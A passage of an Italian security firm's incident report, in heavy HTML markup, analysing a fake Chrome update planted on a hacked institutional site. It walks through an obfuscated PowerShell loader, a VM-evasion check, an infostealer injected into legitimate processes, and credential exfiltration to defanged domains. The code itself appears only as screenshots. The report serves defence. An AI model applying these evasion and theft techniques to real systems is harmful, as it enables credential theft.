  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Chrome Screenshot2&quot; title=&quot;&quot; src=&quot;/website/static/f9851e36b23364571700dcaacd0fe7ed/0940f/ChromeInfostealer2.png&quot; srcset=&quot;/website/static/f9851e36b23364571700dcaacd0fe7ed/804b2/ChromeInfostealer2.png 384w,
/website/static/f9851e36b23364571700dcaacd0fe7ed/e5715/ChromeInfostealer2.png 768w,
/website/static/f9851e36b23364571700dcaacd0fe7ed/0940f/ChromeInfostealer2.png 1154w&quot; sizes=&quot;(max-width: 1154px) 100vw, 1154px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  &lt;p&gt;&lt;em&gt;Dettagli del modale malevolo che innesca la kill chain&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
In rete è anche possibile trovare un riferimento alla kill chain ricostruita in questo incidente di sicurezza. 
&lt;p&gt;Questo report ha l&apos;obiettivo di delineare lo sviluppo dell’incidente e le necessarie contromisure da adottare.&lt;/p&gt;
&lt;p&gt;Analizzare ogni fase dell&apos;attacco ci permette non solo di capire le modalità di compromissione, ma anche di affinare continuamente le nostre tecniche di difesa per garantire una protezione sempre più efficace ai nostri clienti.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;3. Strumenti di analisi utilizzati &lt;a id=&quot;3-strumenti-di-analisi-utilizzati&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Al fine di svolgere un’analisi esaustiva, sono stati utilizzati i seguenti strumenti:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sandbox Windows 10&lt;/strong&gt;, impiegata come macchina virtuale per analizzare il comportamento del payload individuato.&lt;/p&gt;
&lt;p&gt;Questo approccio ci ha permesso di osservare in un ambiente controllato e sicuro come il malware agisse una volta eseguito, fornendoci informazioni cruciali per comprendere la minaccia e aggiornare opportunamente i sistemi di difesa per neutralizzare in futuro la minaccia stessa.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;4. Analisi effetuate &lt;a id=&quot;4-analisi-effettuate&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Il team di Incident Response di Certego ha proceduto, in prima istanza, a effettuare l’analisi dei payload scaricabili da un utente vittima sotto forma di script PowerShell offuscato, per iniziare a ricostruire la kill chain dell’attacco. A seguito dell’analisi degli script, sono state condotte ulteriori indagini sul portale istituzionale al fine di identificare la vulnerabilità sfruttata dagli attaccanti, che ha permesso loro di caricare il modale del fake update indicato precedentemente. Infine, è stato esaminato l’intero codice della web app per capire come il sito sia stato compromesso.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;4.1 Kill Chain &lt;a id=&quot;kill-chain&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Il primo payload in PowerShell analizzato si occupa di effettuare una richiesta HTTP al dominio rtattack[.]baqebei1[.]online con l’obiettivo di scaricare il secondo stage del malware sulla macchina vittima:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1212px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/1da0421319996925729b32f22bc4b766/bb051/ChromeInfostealer3.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 69.01041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAABYlAAAWJQFJUiTwAAABs0lEQVR42n2T666bMBCEef+Hq1S1SdMTSAhgY3zD2MD528+YVmoqVRpZ6/XueHYM1RyisX7dPtdtX9eddds+07bHdfs/qKmUt71WozODnaQz0ulOS7ZLWtP6myJtbN9AvnLL4pZAZ6dHmlst7+OrN0o4DWSG0bM/uDboCmnhrWJa0Uxzq0Vnxuc0vLQkJmhUR9BOglN6ptmBEBPr6M0cYwXrYxquQ30V9dfu9r3/uIrmMtRf2ssP0aDiW38vFFDDQk9vFRf4ZcmyIVvy/VlJKmas2bysLZ2ZkBXmZKk8Trds2GAVFJ0dSwx9b0duy15axfxMftpW2NNWSCuMfUx98Qwwamckszy1IP8yEoUkIcozewcRAwMfl0rYiVEZr1YvJrwM95/yScVNPjCCDEcYQdCo/mNsb6LBI9izYaO3teqUd9BTAbhfuIkKRGE4ASNARzNDUTzHdD6Vnh0p5GEmwNXnJGhG7eN4NhQRMIU4HqwglI/EhLnPb5A9wwZcJUAS9D5G3sOf24z3LwwnEIyYQ61WzoSUzuPs6p814705pOjiYpbZghhcDMdHn/HPn/AX1n3/BZcHBxITrkCsAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain1&quot; title=&quot;&quot; src=&quot;/website/static/1da0421319996925729b32f22bc4b766/bb051/ChromeInfostealer3.png&quot; srcset=&quot;/website/static/1da0421319996925729b32f22bc4b766/804b2/ChromeInfostealer3.png 384w,
/website/static/1da0421319996925729b32f22bc4b766/e5715/ChromeInfostealer3.png 768w,
/website/static/1da0421319996925729b32f22bc4b766/bb051/ChromeInfostealer3.png 1212w&quot; sizes=&quot;(max-width: 1212px) 100vw, 1212px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Successivamente all’esecuzione, viene scaricato un secondo script PowerShell. Il suo codice offuscato è costituito da varie funzioni; di seguito elencate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;La prima funzione  (function G)  agisce da &quot;virtual machine evasion&quot;: lo script verifica se è in esecuzione su una macchina virtuale o su una macchina fisica. Per determinare se si trova all&apos;interno di una macchina fisica, vengono controllati i sensori di temperatura, che non sono presenti in una macchina virtuale. Se la verifica fallisce, lo script si chiude senza compiere alcuna azione.&lt;/li&gt;
&lt;/ul&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1214px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/0b95e2131999ca3bfc0026a76ccaa19c/f8836/ChromeInfostealer4.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 57.29166666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABJklEQVR42n1R226DMAzt///ZXqd1rUShlBIuIVc7oXvcSUAIaXSSZRzL52JzMt6V7WO0RnvvOSAo5329dSisTwoxzPPJEHV6Gq2enOUwE0fHnCeip5RTkTuO2C39TMRxPmnvLqK6iuo2NN+ivIjyIbtainJoqrGtc/1UA5739ET/KZRcwZa4HsW5vZ3b4utZfFSfACd9YigjWyJ4STnFUvAKxmeOP/B8l6KZeojAwmCU8X5yDqPLLljS727hNvAyYTxdu6roH3AB87fsE6SZJeVjMAJnA4VQIy7X66k3CgChJbK0BkuiT4dgWOq0LPpaWm3I44QgQjMZDnErDpWZQ4QIDgufvZlaNUBtP/o3VrByFlI4CehDfDEf6LwF4zdg4f9H34F/AX3gaFr5UmWuAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain2&quot; title=&quot;&quot; src=&quot;/website/static/0b95e2131999ca3bfc0026a76ccaa19c/f8836/ChromeInfostealer4.png&quot; srcset=&quot;/website/static/0b95e2131999ca3bfc0026a76ccaa19c/804b2/ChromeInfostealer4.png 384w,
/website/static/0b95e2131999ca3bfc0026a76ccaa19c/e5715/ChromeInfostealer4.png 768w,
/website/static/0b95e2131999ca3bfc0026a76ccaa19c/f8836/ChromeInfostealer4.png 1214w&quot; sizes=&quot;(max-width: 1214px) 100vw, 1214px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
   &lt;p&gt;&lt;em&gt;Dettaglio della function G.&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;ul&gt;
&lt;li&gt;Le funzioni di seguito riportate, si occupano della decifratura dello script e dello scaricamento del malware vero e proprio:&lt;/li&gt;
&lt;/ul&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1212px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/54a39f92a2b7a5061f8604085a32594f/bb051/ChromeInfostealer5.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 60.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAABZ0lEQVR42o1S2W6DMBDM/39aq6gROQiEhMuxOYyxvTbksWPSRFX60EgjMOudnd1ZVqMxTAhNNFr7AgQtOXKT8xOe5Lx9wJBz07ySWuctA7KmOjfVjp1OosA5FUUicsR7PXajQpq2NjApAGTyfoXX5G8JzzdVDMKuTg/XbFMdt3XymUdfZbyt05Moa9mIoR+MuUMZg3YCGfWYbM5NLZRsx6HsOVdd0V0hiyeTbd0LkBEXqkdCoyTaCWRtici3SvIhEBCdpluYM4w6A2Fav3w+xib3aHtpQytrMFWvFcjSaABFYRiAvOfhiSAJZXRf9aLs+LmtIX4durxjOOD6d/YLfsgoiX5g2MclOvLLgWWwB25jTmzrX3LYJAyDydhTtLid8hzi75AhPcGqdbFbF3vIwkzUgslvke1Cxko3ZRxVScwv2PaeZTDPkNfBsFeMlizIKACEP8457WASjfDWuaWov9/+Ba78PH8DNYSbUCv6dUoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain3&quot; title=&quot;&quot; src=&quot;/website/static/54a39f92a2b7a5061f8604085a32594f/bb051/ChromeInfostealer5.png&quot; srcset=&quot;/website/static/54a39f92a2b7a5061f8604085a32594f/804b2/ChromeInfostealer5.png 384w,
/website/static/54a39f92a2b7a5061f8604085a32594f/e5715/ChromeInfostealer5.png 768w,
/website/static/54a39f92a2b7a5061f8604085a32594f/bb051/ChromeInfostealer5.png 1212w&quot; sizes=&quot;(max-width: 1212px) 100vw, 1212px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1220px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/f91b0e2c8d46749260238f99c5b45d54/cd138/ChromeInfostealer6.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 125.26041666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAIAAAC+dZmEAAAACXBIWXMAABYlAAAWJQFJUiTwAAADAUlEQVR42o2U6W7bMBCE/f4vlrppEsf3Jeu+RR2kRCf/+pGM0zhogQILgqL2mJ0dcqYmPaixV4r1/62Xapz0TI6T+1CjnkbNOmLTVdnV7fHDTarJOVv/UblgksRNcS7CcxFhXhmf8iCoUq+Itsn5mPmXMm76vum7ZugpcxdM+lMevoTbl3C3So7r+LiM9tvE45PDRbj75a9W8fE52LxG+3YgVhukt8o6rLJD5vtV4pXRPrtghzw428qE7VJvk5zYcJ40hRhMglvl6brP/J+X5Q9vAUic/CqlkVRUcV2AnzWqc79MOCQ4b+s/wTBRdCJpSjwyUVddy7+rfp+mNzqaDGHG7Ab+9B1sXEFStI0YDCt137EnPesHt0r1ZnUb9Y1tTbeQEdjO18kJwh2QTsp/zPlLMN42OF1Ee7gJyjRtSgwiA2MpFtUZuZQbtRw/RKL1O5N8DreUJXKbescsgGGmHdaZbaStbTtu2p1Unel5mtFJJiqmQiSTwAP+UlFSCuRhnQOe+lBNIgskLTtBlmEcTXAu6mV8ZFRIgjkd8+CCa5WhHJIShjCAK++1/TlnQ33ZNqSEZDgfjcgna9qZvP9UNmqGKwLM2ppI8DPnojUzxxBJYmljw9iKtgYOgsnMedGPatZK+RxsgQ1Pzmiy6HA1QExMZzZwUfVt1posZSs4gW8qDwQYMTYlWSkFckqljUHBxqkF2ZVWhQ4FzqjFVEYVDJkUrMvoYG/VgYGDaBWfIJn4yqAQrgYE56KBBcM2RSYrXa3f0DOmp3fN6uRtfiHyq9O5M0M+wUIODOnRX82916dgY2/19ilYc/LgLeaX5cN58eC9LKIdWObW89Ffc9WlnbPyihhJBfYawiQrnKWGeRpu7BRc28JSKIANf5O+zjolUQXa9sv0UiVOxuQiknl+qsJePiVv+97Jk2CUhNzgkxS8ZARfipiVFyu2bwDnyIFN3bUgoix/DdsEb5IzPCMA0NpRNe6Vu13mv72+7koCpqKfVtwCFDrupXTWfVm/nchx/A2v016pSSCF9gAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain4&quot; title=&quot;&quot; src=&quot;/website/static/f91b0e2c8d46749260238f99c5b45d54/cd138/ChromeInfostealer6.png&quot; srcset=&quot;/website/static/f91b0e2c8d46749260238f99c5b45d54/804b2/ChromeInfostealer6.png 384w,
/website/static/f91b0e2c8d46749260238f99c5b45d54/e5715/ChromeInfostealer6.png 768w,
/website/static/f91b0e2c8d46749260238f99c5b45d54/cd138/ChromeInfostealer6.png 1220w&quot; sizes=&quot;(max-width: 1220px) 100vw, 1220px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Per le analisi di contesto, è stata eliminata la funzione di “VM Evasion”; in questo modo è stato possibile effettuare il download del terzo stage dell’attacco, un file compresso contenente un malware di tipo infostealer. Lo script PowerShell scarica il file, decomprime l’archivio ed esegue il malware.&lt;/p&gt;
&lt;p&gt;L&apos;Infostealer, successivamente, effettua una “code injection” in processi già in esecuzione e leciti, sovrascrivendo la loro memoria per evitare di essere intercettato dai software antivirus. Il malware tenta di estrarre le credenziali salvate in memoria e di inviarle tramite una chiamata HTTP di tipo POST al dominio &lt;em&gt;cdnforfiles[.]xyz.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;La kill chain è stata ricostruita attraverso l’analisi dei vari redirect e payload:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In primis, vi è stata la violazione del sito istituzionale e conseguente inserimento di un fake update di Chrome;&lt;/li&gt;
&lt;li&gt;Cliccando sul fake update viene eseguito uno script PowerShell, offuscato in base64, che redirige al dominio &lt;em&gt;rtattack[.]baqebei1[.]online&lt;/em&gt;;&lt;/li&gt;
&lt;li&gt;Da quel dominio viene scaricato un secondo payload sotto forma di script PowerShell, cifrato usando l’algoritmo AES128, che esegue il download del malware vero e proprio;&lt;/li&gt;
&lt;li&gt;Viene scaricato il payload &lt;em&gt;data.zip&lt;/em&gt; che contiene un malware di tipo infostealer, immediatamente eseguito;&lt;/li&gt;
&lt;li&gt;L’infostealer, eseguendo una code injection in processi leciti, come ad esempio &lt;em&gt;“searchindexer.exe”&lt;/em&gt;, ruba le credenziali di accesso ed effettua una chiamata HTTP di tipo POST verso il dominio &lt;em&gt;cdnforfiles[.]xyz&lt;/em&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1222px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/730f43d22a3f37e4a65d9f552f148fa4/636d3/ChromeInfostealer7.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 60.15625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAABLElEQVR42o1R2W7CQAzM/39exQPiekgPpdCC2MvrI6HjRQhoadXRyDtS1p7ZuBMRIqqVWJiqq0LEzKefmKYb6ehqrSGVUPiYOYAxhRhjSrkUEOKCTG02NYgqRnhzTDmiP2UwtusoGJHRXciLn2RmY8P5cGcWwYfKyOw4x0ZFcjW7T33F2NjhUoYFUWk5k9uRjfbt9kN0quoujASCUrmaXTtPfwKx2V/U0npgqu5fMoZ6tgseO8Ou/Q7fFoJD/GI43enJ2VXWSBLJglNDplgqmEBi15kycRWroo0ukKqt6rM/vi7DsDm+reOwKdtNfl/nYYV60S503+vBKRD73g79lHZdGRahf0ovs/Q8Q+VhPn4sb7hqXNpucaFr3c7R32HjogaqjSzKYlN733/4BffXuVLFMicHAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain5&quot; title=&quot;&quot; src=&quot;/website/static/730f43d22a3f37e4a65d9f552f148fa4/636d3/ChromeInfostealer7.png&quot; srcset=&quot;/website/static/730f43d22a3f37e4a65d9f552f148fa4/804b2/ChromeInfostealer7.png 384w,
/website/static/730f43d22a3f37e4a65d9f552f148fa4/e5715/ChromeInfostealer7.png 768w,
/website/static/730f43d22a3f37e4a65d9f552f148fa4/636d3/ChromeInfostealer7.png 1222w&quot; sizes=&quot;(max-width: 1222px) 100vw, 1222px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
   &lt;p&gt;&lt;em&gt;Dettaglio delle connessioni eseguite nell’arco dell’esecuzione della kill chain&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1218px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/e5f93c3ca5d6b1569c72bc3a5dc883a4/c929c/ChromeInfostealer8.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 42.447916666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABYlAAAWJQFJUiTwAAABYElEQVR42m2Q226CQBBA+QgfaiJUBdkLO5bLsoCwCxRvvaD1Q0xU/AHf/egutk9NJyczZzLJJDOGUioKgyrPVZYVaZInopcs/fVFJh+uRS0Wi0S8UAKUjKdOu9sbsigC5GwArZi7ZKhhaOmh14f8sNUZyKrPuGF4O6fyhY1te7//MvI8tx1nhrGDkIPwAy1ohtDUxT7WG7HP44ASkWY8SbAfiySdTiZt2xqlKgEgEULwOIqiMAxjzjU8ino4FzHvhzyihCDkYuQSgq3n8We7M6qqSoVY1nVdlqUsZJFXWvRKKTVKSd3UVaVlDsA8Cp43Z2zquLuvg6GkDNBsC3jD0JrhFeC1Prvn1z/0O4BsAL8H8BbCZ8Dq0Ldn7uFwMHzffxoOTcsameYfhqZJrFFlW4QBnTwzmFPPMx3KGBsMBk3TGLfb7XQ6Xa/X7r+4dN2p06OLlvP5fNG11+54PN7v92+RKm0sGgcjHgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Kill Chain6&quot; title=&quot;&quot; src=&quot;/website/static/e5f93c3ca5d6b1569c72bc3a5dc883a4/c929c/ChromeInfostealer8.png&quot; srcset=&quot;/website/static/e5f93c3ca5d6b1569c72bc3a5dc883a4/804b2/ChromeInfostealer8.png 384w,
/website/static/e5f93c3ca5d6b1569c72bc3a5dc883a4/e5715/ChromeInfostealer8.png 768w,
/website/static/e5f93c3ca5d6b1569c72bc3a5dc883a4/c929c/ChromeInfostealer8.png 1218w&quot; sizes=&quot;(max-width: 1218px) 100vw, 1218px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
   &lt;p&gt;&lt;em&gt;Dettaglio delle attività malevole eseguite dal malware e identificate dall’antivirus&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h3&gt;4.2 Analisi dell&apos;applicazione web &lt;a id=&quot;analisi-dell-applicazione-web&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Attraverso lo strumento “&lt;em&gt;developer console&lt;/em&gt;” del browser è possibile verificare che il modale viene caricato dal seguente sito esterno: “&lt;em&gt;d1x9q8w2e4[.]xyz&lt;/em&gt;”&lt;/p&gt;
&lt;p&gt;L’url viene contattato attraverso l’esecuzione di codice Javascript, offuscato in base64, ogni volta che una pagina del sito viene visualizzata nel browser.&lt;/p&gt;
&lt;p&gt;Di seguito riportiamo il codice malevolo:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1216px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/760e33fb67e778d46fa767fb501527c7/061c7/ChromeInfostealer9.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 65.10416666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABYlAAAWJQFJUiTwAAAB+0lEQVR42kVS2ZKjMAzk/79q9sg5CYGQMOGwwRzmCqexyb5tO0ztVnVRjWS1WioZk5jLqny27SyXWSoxKxB8p1l+Q8h/fBTzigFlUhntKPz0GRctr2qWc940UZVV3XMQohtHYCWt5lMvxPBGP0FTGs9hICUPyyzkjPAkLJjHI9SzmpMqies8aQqg6Jq67+BIyZdSLylfMGjUfXvP/Gvqmcy12JfJ7uf4DnJL/QO1t+HlFDnXxLulgZP6Xzlxs/CWaY7mRjN0dvIwYxc1ICi7MBfQEonmiIBD6EivIEdqn6LbMbp202jUQ/8ZOWsN0k4aXNiXxR4Qgh1wO/FWCfS3GdTdNd6LCcXdLrzsiX2g19/B+cM77Ii1JxY4tGB7/d0E5z21ztENcbhAUBc/xwEbAh48umfhPQsw2INTr0CE6glTH1nMqd/kFG8QB9HFZd/uQutXcMIYm9DcBCYa/vRP4HCE3y25/PCOH95xqw1qR9vQBGnHQXde5X0e+UWMrb5boUMAeaTcXNvBCpy3BRBYw7P3zH0H7Q01P2NnQ8wdtQCsEIA8mmC8dci1IcbGtkH0tptx8CkhXkgI9b0g8mmUJG5OcDNpU9IqxZ2whuNmaJXFVY5rKdonUuM8G7NalFjUKNWkADkqNS9CKimXZfnzH+qbSLzHhamXWl5/AS56rWNc182SAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo&quot; title=&quot;&quot; src=&quot;/website/static/760e33fb67e778d46fa767fb501527c7/061c7/ChromeInfostealer9.png&quot; srcset=&quot;/website/static/760e33fb67e778d46fa767fb501527c7/804b2/ChromeInfostealer9.png 384w,
/website/static/760e33fb67e778d46fa767fb501527c7/e5715/ChromeInfostealer9.png 768w,
/website/static/760e33fb67e778d46fa767fb501527c7/061c7/ChromeInfostealer9.png 1216w&quot; sizes=&quot;(max-width: 1216px) 100vw, 1216px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Si può notare la presenza di una funzione (cjs()) che, una volta deoffuscata, rivela la presenza di comandi per il caricamento di elementi HTML nascosti alla vista del navigatore; questi elementi effettuano chiamate HTTP verso due URL:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1218px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/924983d1c1c4f73c5c96105b702a1e9c/c929c/ChromeInfostealer10.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 43.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABYlAAAWJQFJUiTwAAABeElEQVR42j1S2W7cMAz0//9aUTSNvZZ1UKIkSz7jYNc6tm+hs0UAghiQGl6jZt22eV3PlFIuqdRUyg84c36k/3bm8gNeuNRnM673uN3DnpbjsWz7tN/X4z5vW1yP415zolo15+d55pQIVPIplfOqkhtuRmUj0yPXjivdCS2NGyQM3vYBYXE84m1UanYiIpmcKWjHeaH+jTLIhGJSSYMdl4NUFxM0G1WrFQN8c+wXdK0Wf2z/G7sOoFX6FiQN3uAatffKWB8mMI6DGZT288QmYM6MYaeEmyIPxi4RfQDtg90DHmfJjZl974EI0trW8N4qAaZXavDa8A/ASQZktI6FHukZvDPWCiGcpaM2OK8jfsZp087jFAR1CIEGkWCVtjZGFezofERrAsrgMe7jNE/bRnI0HCNTyEETgbwcwsBNNwiaX6FlEv7eBpSgbz1IaAW8C799fD7OS7Ym51IuVWv+NlLvBegeuX4Haz3r83z+S+VKlddHIFZ9fgGvFeXsAEhb7AAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Codice malevolo2&quot; title=&quot;&quot; src=&quot;/website/static/924983d1c1c4f73c5c96105b702a1e9c/c929c/ChromeInfostealer10.png&quot; srcset=&quot;/website/static/924983d1c1c4f73c5c96105b702a1e9c/804b2/ChromeInfostealer10.png 384w,
/website/static/924983d1c1c4f73c5c96105b702a1e9c/e5715/ChromeInfostealer10.png 768w,
/website/static/924983d1c1c4f73c5c96105b702a1e9c/c929c/ChromeInfostealer10.png 1218w&quot; sizes=&quot;(max-width: 1218px) 100vw, 1218px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;ul&gt;
&lt;li&gt;Il primo URL “*&lt;a href=&quot;https://bsc-dataseed1%5B.%5Dbinance%5B.%5Dorg*%E2%80%9D&quot;&gt;https://bsc-dataseed1[.]binance[.]org*”&lt;/a&gt; è legato al crypto mining; è possibile dedurre questo dal codice che contiene l’indirizzo di un wallet sulla piattaforma Binance[2];&lt;/li&gt;
